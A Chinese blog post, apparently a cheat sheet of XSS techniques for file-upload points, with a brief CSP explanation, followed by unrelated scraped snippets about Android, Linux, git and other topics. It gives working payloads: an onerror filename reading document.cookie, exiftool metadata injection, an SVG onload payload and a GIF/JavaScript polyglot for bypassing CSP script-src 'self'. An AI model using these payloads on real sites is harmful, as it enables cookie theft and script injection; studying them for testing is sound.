XSS 各种姿势总结(随时更新)

内容安全策略(Content Security Policy,简称CSP)

  是一种以可信白名单作机制,来限制网站中是否可以包含某来源内容。默认配置下不允许执行内联代码 <script> 块内容,内联事件,内联样式 ,以及禁止执行eval() , newFunction() , setTimeout([string], …) 和setInterval([string], …) 。

CSP更详尽的介绍可以在drops看到:http://drops.wooyun.org/tips/1439

文件上传点 xss 姿势:

  在文件名中写入xss payload:

"><img src=x onerror=alert(document.cookie)>.gif

  修改图片元数据 Metadata:    

ExifTool 的作者是Phil Harvey,这是一个元信息读写编辑工具。

ExifTool 在修改原始文件之前,会自动将原文件改名保存为*.origin,因此不必担心原始文件被破坏掉。 

exiftool -Artist=‘xss payload‘ *.jpg(修改作者信息)? exiftool -model="xss payload" *.jpg(修改相机型号)......

  

  修改Content

如果应用允许上传SVG格式的文件(其实就是一个图像类型的),那么带有以下content的.svg文件可以被用来触发XSS:

<svg xmlns="http://www.w3.org/2000/svg"onload="alert(document.domain)"/>

  如果知道上传gif图片的地址,且能在相同的域注入:

建立一个携带有JavaScript payload的GIF图像用作一个脚本的源内容为:GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;payload:<script src=http://xx/xss.gif>

对绕过CSP(内容安全策略)保护“script-src ‘self’”(即拦截<script>alert(1)</script>)是很有用的

 

 

时间: 2024-08-14 05:13:52

XSS 各种姿势总结(随时更新)的相关文章

Android 常用的快捷键(随时更新)

android studio 是google出的一款好用不贵的ide,好像是powerd by idea的那个公司,反正风格上差不多.下面是android studio常用的快捷键设置,记录一下自己用的,随时准备查看: 1.看代码时候用的 查看有哪些类实现了某个接口  ctrl + Alt + B 查看类的继承关系 选中类按 F4 查看具体类的实现 ctrl + 鼠标选中点击 回到方法括号的开始处或者到方法括号的结尾处  ctrl + [   和ctrl + ] 列出一个类里面的所有方法   A

一些开发中不常用但很实用的小技能,可能就一行代码,随时更新,个人备忘

最近经常纠结在各种不常用的小问题上.比如cell上因为文字内容不固定而不固定cell的行高,除了在tableView: heightForRowAtIndexPath: 这个协议方法中动态加载之外,有一个一行代码就可以解决的方法.不过目前只是想到这个问题,并没有想起是哪一行代码,什么时候想起来什么时候来填坑吧.随时更新各种小技巧. // 设置UITableView上cell上的线条Style tmpTableView?.separatorStyle =  UITableViewCellSepar

All Kind Of Conference(随时更新...)

收集一些前端开发的各种会议,里面有视频或者PPT,随时查看都还是很有收获的.还有要向这些演讲的前辈看齐- AC 2015:http://ac.alloyteam.com/2015/ AC 2016:http://ac.alloyteam.com/ 中国首届CSS开发者大会:https://css.w3ctech.com/1 中国第二届CSS开发者大会:https://css.w3ctech.com/2 中国第三届CSS开发者大会:https://css.w3ctech.com/ 第11届D2前端

linux 常用操作指令(随时更新)

ls: 查看当前目录下文件列表 -l   列出文件详细信息l(list)  -a   列出当前目录下所有文件及目录,包括隐藏的a(all) mkdir         创建目录 -p           创建目录,若无父目录,则创建p(parent) cd               切换目录 touch          创建空文件 echo            创建带有内容的文件.  cat              查看文件内容  cp                拷贝 mv    

编程学习笔记 随时更新

自己把在学习中得到的经验随时写下来. ---------------------------------- VC中表示基地加偏移数据 int * p; p = (int *)0x001897D4; p=(int *)(*p+0x8); p=(int *)(*p+0x4); -------------------------------------

【转】git 学习笔记( 随时更新中…… 最后更新日期201304281518)--不错

原文网址:http://blog.csdn.net/yasin_lee/article/details/5975070 GIT 是版本管理的未来!   推荐几个GIT教程网站 http://www-cs-students.stanford.edu/~blynn/gitmagic/intl/zh_cn/index.html  http://progit.org/book/zh/   http://www.linuxsir.org/main/doc/git/gittutorcn.htm http:/

java程序员单词(随时更新)

第一期:1.absolute 绝对的2.address 地址3.bus 总线4.architecture 架构5.area 区域6.array 数组7.audio 音频8.video 视频9.base 基础10.bluetooth 蓝牙11.branch 分支12.code 代码13.constant 常量14.memory 内存,记忆体15.cursor 游标16.bank 银行17.data 数据18.process 进程19.thread 线程20.default 默认 第二期 21. b

python+lego ev3的心得总结 随时更新

一.连接方面 1.试了蓝牙连接,被电脑防火墙拒绝了很多次,很奇怪,明明都pin码都对上了,然后瞬间被踢开. 2.数据线直连,在一台win7上怎么试也不行,在另一台上自动上windows update上更新驱动,更新了快8.9分钟,居然安装成功,神奇. 二..net code 1.更新到了1.39版,不知道为啥ev3的官方大安装包(LME-EV3_Full-setup_1.4.2_zh-CN_WIN32)安装完了,在code界面上,扩展程序中也安装了ev3dev,然后左侧的功能条上没有对应图标,奇

随时更新———个人喜欢的关于模式识别、机器学习、推荐系统、图像特征、深度学习、数值计算、目标跟踪等方面个人主页及博客

目标检測.识别.分类.特征点的提取 David Lowe:Sift算法的发明者,天才. Rob Hess:sift的源代码OpenSift的作者,个人主页上有openSift的下载链接.Opencv中sift的实现.也是參考这个. Koen van de Sande:作者给出了sift,densesift,colorsift等等经常使用的特征点程序.输出格式见个人主页说明,当然这个特征点的算法,在Opencv中都有实现. Ivan Laptev:作者给出了物体检測等方面丰富C\C++源代码,及部